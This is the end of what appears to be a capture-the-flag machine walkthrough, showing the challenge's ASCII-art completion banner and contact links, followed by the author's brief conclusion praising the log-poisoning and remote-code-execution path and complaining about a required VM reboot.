███   ███   ███    ███     ███   ▀  ▄███▄▄▄▄██▀   ███    ███     ███ 
███   ███ ▀███████████     ███     ▀▀███▀▀▀▀▀   ▀███████████     ███ 
███   ███   ███    ███     ███     ▀███████████   ███    ███     ███ 
███   ███   ███    ███     ███       ███    ███   ███    ███     ███ 
 ▀█   █▀    ███    █▀     ▄████▀     ███    ███   ███    █▀  █▄ ▄███ 
                                     ███    ███              ▀▀▀▀▀▀  


!! Congrats you have finished this task !!		
							
Contact us here:						
								
Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://www.linkedin.com/in/geet-madan/		
													
+-+-+-+-+-+ +-+-+-+-+-+-+-+					
 |E|n|j|o|y| |H|A|C|K|I|N|G|			
 +-+-+-+-+-+ +-+-+-+-+-+-+-+						
__________________________________

And that’s it.

Conclusion

This was a fun challenge to do.
There were some points I didn’t like, such as the need to physically reboot the VM to make the exploit work.
Like I already mentioned, this can become a problem if the VM is not within your physical reach.
I did like the log poisoning and the way to get RCE.

Overall it was a good challenge and offers pentesters some new things to learn.
Keep up the good work!!!
